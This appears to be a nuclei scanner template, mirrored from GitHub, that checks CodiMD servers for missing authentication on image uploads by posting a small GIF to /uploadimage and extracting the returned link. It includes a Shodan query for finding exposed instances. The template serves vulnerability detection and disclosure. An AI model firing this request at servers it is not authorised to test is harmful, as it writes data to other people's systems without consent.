mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-01-31 15:53:33 +08:00
49 lines
1.7 KiB
YAML
49 lines
1.7 KiB
YAML
id: codimd-unauth-file-upload
|
|
|
|
info:
|
|
name: CodiMD - File Upload
|
|
author: denandz,PulseSecurity.co.nz
|
|
severity: medium
|
|
description: |
|
|
CodiMD does not require valid authentication to access uploaded images or to upload new image data. An attacker who can determine an uploaded image's URL can gain unauthorised access to uploaded image data, or can create a denial of service condition by exhausting all available disk space.
|
|
reference:
|
|
- https://github.com/hackmdio/codimd/security/advisories/GHSA-2764-jppc-p2hm
|
|
- https://pulsesecurity.co.nz/advisories/codimd-missing-image-access-controls
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
shodan-query: html:"CodiMD"
|
|
tags: file-upload,intrusive,codimd,vuln
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /uploadimage HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161
|
|
|
|
-----------------------------92633278134516118923780781161
|
|
Content-Disposition: form-data; name="image"; filename="{{randstr}}.gif"
|
|
Content-Type: image/gif
|
|
|
|
{{base64_decode("R0lGODlhAQABAIABAP///wAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==")}}
|
|
-----------------------------92633278134516118923780781161--
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- '"link":".*?.gif"'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- '"link":"(.*)"'
|
|
# digest: 4a0a0047304502200470a999a65a4a9c08ef0d5b49eab2f1b7ea4690d91f9517ce9a10698da4ed73022100910a807234d038a82d7a67c71c120b1c60ac3f97957e7b2f31ab3eb588f208a5:922c64590222798bb761d5b6d8e72950 |